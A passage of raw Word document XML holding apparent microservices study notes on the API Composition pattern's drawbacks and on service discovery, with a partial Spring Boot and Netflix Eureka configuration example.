          <v:rect id="_x0000_i3152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DAAD5A" w14:textId="77777777" w:rsidR="003E28EC" w:rsidRPr="003E28EC" w:rsidRDefault="003E28EC" w:rsidP="003E28EC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Drawbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60390C3E"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API Composer becomes a </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if not scaled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797895C"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Latency increases</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if multiple services are slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7D3D67"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Harder to implement if services depend on each other sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA96DFC" w14:textId="77777777" w:rsidR="003E28EC" w:rsidRPr="003E28EC" w:rsidRDefault="00000000" w:rsidP="003E28EC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6C08A3BB">
          <v:rect id="_x0000_i3153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED4704" w14:textId="77777777" w:rsidR="003E28EC" w:rsidRPr="003E28EC" w:rsidRDefault="003E28EC" w:rsidP="003E28EC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA6900"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Composition</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a pattern where an intermediary aggregates data from multiple microservices and presents a </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unified response</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to clients. It's ideal when you need to expose complex views built from multiple sources without coupling services tightly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692B0B46" w14:textId="77777777" w:rsidR="003E28EC" w:rsidRPr="003E28EC" w:rsidRDefault="003E28EC" w:rsidP="003E28EC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Would you like an example using </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GraphQL for API composition</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Gateway with composition logic</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC0AA8"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2C363E47">
          <v:rect id="_x0000_i3154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01219372" w14:textId="699224A9" w:rsidR="007635D1" w:rsidRPr="00CE4B95" w:rsidRDefault="005472D8" w:rsidP="007635D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="738" w:name="_Toc197867952"/>
      <w:r w:rsidRPr="005472D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Service Discovery</w:t>
      </w:r>
      <w:r w:rsidR="007635D1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="738"/>
    </w:p>
    <w:p w14:paraId="00970E17" w14:textId="72CC146C" w:rsidR="0091518F" w:rsidRPr="000B09B5" w:rsidRDefault="0091518F" w:rsidP="00893CBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B09B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Discovery is a mechanism used in microservices architecture to automatically detect and connect services without hardcoding their network locations (IP/Port). It ensures that services can find and communicate with each other dynamically, even as instances scale up/down or move across hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E043576"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39D21709">
          <v:rect id="_x0000_i3155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4283D70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Why Is Service Discovery Needed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DDAA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In a distributed system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F0F9B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w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scale dynamically</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9A18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nstances are frequently </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>created/destroyed</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A57D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IP addresses and ports </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>change often</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BFDA60" w14:textId="77777777" w:rsidR="0091518F" w:rsidRPr="0091518F" w:rsidRDefault="0091518F" w:rsidP="00816802">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hardcoding addresses leads to failure.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Discovery solves this by acting like a dynamic address book.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29631A"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4BCA7E86">
          <v:rect id="_x0000_i3156" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CBA833"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Two Types of Service Disco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5807"/>
        <w:gridCol w:w="3300"/>
      </w:tblGrid>
      <w:tr w:rsidR="0091518F" w:rsidRPr="0091518F" w14:paraId="057D55EE" w14:textId="77777777" w:rsidTr="0091518F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D007881"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261BCDBF"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B0ECE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Example Technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0091518F" w:rsidRPr="0091518F" w14:paraId="531E3E58" w14:textId="77777777" w:rsidTr="0091518F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="345630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Client-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69830856"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queries the service registry and selects a service instance itself</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62E3AAD9"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etflix Eureka (with Ribbon), Consul</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0091518F" w:rsidRPr="0091518F" w14:paraId="675F553D" w14:textId="77777777" w:rsidTr="0091518F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A4A84F1"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er-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27DAFCA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lient calls a load balancer or API Gateway which queries the registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="171A4F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AWS ELB, Istio, Kubernetes (CoreDNS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F560330"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3264B4BF">
          <v:rect id="_x0000_i3157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C53635"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omponents of Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BD6D10"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1. Service Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DE888"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Central directory that keeps track of all registered service instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539EB4FF"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xamples: </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netflix Eureka</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Consul</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Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes API Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9283C4"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2. Service Provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D5A39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Each service </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>registers itself</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on startup with the registry (with IP, port, health status).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2745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On shutdown or failure, it deregisters or gets removed via health checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66BB59" w14:textId="77777777" w:rsidR="0091518F" w:rsidRPr="0091518F" w:rsidRDefault="0091518F" w:rsidP="00893CBB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Service Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E1B93"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When calling another service, it queries the </w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>registry</w:t>
      </w:r>
      <w:r w:rsidRPr="0091518F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get a live instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4B2D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Then makes the actual HTTP/gRPC/etc. request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AEA7AC"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5C76C399">
          <v:rect id="_x0000_i3158" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01632DBB"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Example: Spring Boot + Netflix Eureka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DE13E9"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Provider (e.g., user-service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C14BA2"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F477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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>register</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w: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7DE664BE"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eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>registry</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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0630B7" w14:textId="492B3CA0"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856"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004274D4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D1E3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SpringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E2EC6"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@EnableEurekaClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54115FC1" w14:textId="0D7FEF29"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74079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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
